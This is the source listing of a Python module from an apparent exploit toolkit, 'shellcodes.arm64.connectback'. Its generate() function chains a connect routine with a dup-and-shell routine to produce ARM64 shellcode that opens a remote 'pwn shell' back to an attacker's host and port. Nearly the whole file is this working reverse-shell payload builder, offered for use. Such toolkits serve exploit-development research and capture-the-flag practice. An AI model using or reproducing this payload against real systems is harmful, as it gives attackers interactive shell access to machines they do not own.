Source code for shellcodes.arm64.connectback
# connection back
from socket import htons, inet_aton, gethostbyname
from struct import unpack
import connect
import dupsh
[docs]def binary_ip(host):
return inet_aton(gethostbyname(host))
[docs]def u32(u):
return unpack("<I", u)[0]
[docs]def generate(host='127.0.0.1', port=31337, sock='x6'):
"""connection back to attacker with pwn shell on specific port
argument:
host (str) : specific IP address or hostname
port (int/str): specific port
sock (int/str): sock descriptor for dupsh()
"""
sc = connect.generate(host, port)
sc += dupsh.generate(sock)
return sc
if __name__ == '__main__':
print generate()